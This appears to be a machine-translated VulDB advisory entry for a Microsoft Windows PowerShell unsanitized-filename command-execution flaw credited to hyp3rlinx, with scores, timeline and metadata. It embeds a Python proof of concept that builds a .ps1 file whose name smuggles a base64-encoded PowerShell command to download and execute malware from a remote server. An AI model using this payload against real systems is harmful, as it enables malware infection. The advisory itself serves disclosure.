| CVSS 元临时分数 | 当前攻击价格 (≈) | CTI兴趣分数 |
|---|---|---|
| 5.7 | $0-$5k | 0.00 |
摘要
在Microsoft Windows 中已发现分类为致命的漏洞。 受此漏洞影响的是未知功能的组件PowerShell。 当 作为Semicolon的一部分被操控时,会导致 权限提升。 攻击可能远程发起, 此外还有一个漏洞可利用。 建议禁用受影响的组件。
细节
在Microsoft Windows 中已发现分类为致命的漏洞。 受此漏洞影响的是未知功能的组件PowerShell。 当 作为Semicolon的一部分被操控时,会导致 权限提升。 使用CWE来声明会导致 CWE-94 的问题。 该漏洞已于 2019-08-01 由John Page (hyp3rlinx) 作为公告 (网站)发布。 公告共享下载网址是hyp3rlinx.altervista.org。 此公开信息已与相关厂商协同。
攻击可能远程发起, 无技术细节可用。 该漏洞的普及率低于常规水平。 此外还有一个漏洞可利用。 该漏洞利用已公开,可能会被利用。 漏洞利用的当前现价为美元计算大致为USD $0-$5k。 MITRE ATT&CK项目使用攻击技术T1059来解决该问题。
若有长度,则其被标记为 概念验证。 漏洞利用已在hyp3rlinx.altervista.org提供下载。 该漏洞在至少 12 天内被作为非公开的零日漏洞利用进行处理。 我们估计的零日攻击价值约为$25k-$100k。 此漏洞利用的代码如下:
from base64 import b64encode import argparse,sys #Windows PowerShell - Unsantized Filename Command Execution Vulnerability PoC #Create ".ps1" files with Embedded commands to download, save and execute malware within a PowerShell Script Filename. #Expects hostname/ip-addr of web-server housing the exploit. #By hyp3rlinx #Apparition Security #====================def parse_args(): parser.add_argument("-i", "--ipaddress", help="Remote server to download and exec malware from.") parser.add_argument("-m", "--local_malware_name", help="Name for the Malware after downloading.") parser.add_argument("-r", "--remote_malware_name", help="Malwares name on remote server.") return parser.parse_args()
def main(args): PSEmbedFilenameMalwr="" if args.ipaddress: PSEmbedFilenameMalwr = "powershell iwr "+args.ipaddress+"/"+args.remote_malware_name+" -O %CD%\"+args.local_malware_name+" ;sleep -s 2;start "+args.local_malware_name return b64encode(PSEmbedFilenameMalwr.encode('UTF-16LE'))
def create_file(payload): f=open("Test;PowerShell -e "+payload+";2.ps1", "w") f.write("Write-Output 'Have a nice day!'") f.close()
if _name_=="_main_": parser = argparse.ArgumentParser() PSCmds = main(parse_args())
if len(sys.argv)==1: parser.print_help(sys.stderr) sys.exit(1) create_file(PSCmds) print "PowerShell - Unsantized Filename Command Execution File created!" print "By hyp3rlinx"
建议禁用受影响的组件。
产品
类型
供应商
名称
许可证
网站
CPE 2.3
CPE 2.2
影片

CVSSv4
VulDB 向量: 🔍VulDB 可靠性: 🔍
CVSSv3
VulDB 元基础分数: 6.3VulDB 元临时分数: 5.7
VulDB 基本分数: 6.3
VulDB 临时得分: 5.7
VulDB 向量: 🔍
VulDB 可靠性: 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 向量 | 复杂性 | 身份验证 | 保密 | 完整性 | 可用性 |
|---|---|---|---|---|---|
| 开锁 | 开锁 | 开锁 | 开锁 | 开锁 | 开锁 |
| 开锁 | 开锁 | 开锁 | 开锁 | 开锁 | 开锁 |
| 开锁 | 开锁 | 开锁 | 开锁 | 开锁 | 开锁 |
VulDB 基本分数: 🔍
VulDB 临时得分: 🔍
VulDB 可靠性: 🔍
利用
分类: 权限提升CWE: CWE-94 / CWE-74 / CWE-707
CAPEC: 🔍
ATT&CK: 🔍
身体的: 否
本地: 否
远程: 是
可用性: 🔍
访问: 公共
状态: 概念验证
作者: John Page (hyp3rlinx)
下载: 🔍
价格预测: 🔍
当前价格估算: 🔍
| 0-Day | 开锁 | 开锁 | 开锁 | 开锁 |
|---|---|---|---|---|
| 今天 | 开锁 | 开锁 | 开锁 | 开锁 |
威胁情报
利益: 🔍活跃演员: 🔍
活跃的APT团体: 🔍
对策
建议: 禁用状态: 🔍
0天时间: 🔍
利用延迟时间: 🔍
时间轴
2019-07-20 🔍2019-07-23 🔍
2019-08-01 🔍
2019-08-01 🔍
2019-08-06 🔍
2020-07-21 🔍
来源
供应商: microsoft.com产品: microsoft.com
公告: hyp3rlinx.altervista.org
研究人员: John Page (hyp3rlinx)
状态: 未定义
已协调: 🔍
GCVE (VulDB): GCVE-100-139527
scip Labs: https://www.scip.ch/en/?labs.20161013
条目
已创建: 2019-08-06 07時42分已更新: 2020-07-21 11時24分
更改: 2019-08-06 07時42分 (53), 2020-07-21 11時24分 (2)
完整: 🔍
提交者: hyp3rlinx
Cache ID: 216::103
提交
已接受
- 提交 #80: Microsoft Windows PowerShell / Unsanitized Filename Command Execution (由 hyp3rlinx)
重复
- 提交 #XXXXXX: Xxxxxxx Xxxxxxxxxx / Xxxxxx Xxxx Xxx (xxxxxxxxx) (由 hyp3rlinx)
- 提交 #XXXXXX: Xxxxxxxxx Xxxxxxxx Xxxx-xxxxxxx Xxxxxxxxxx Xxx * Xxxxxx Xxxx Xxxxxxxxx (由 hyp3rlinx)
Be aware that VulDB is the high quality source for vulnerability data.
暂时没有任何评论。 语言: zh + en.
请登录后发表评论。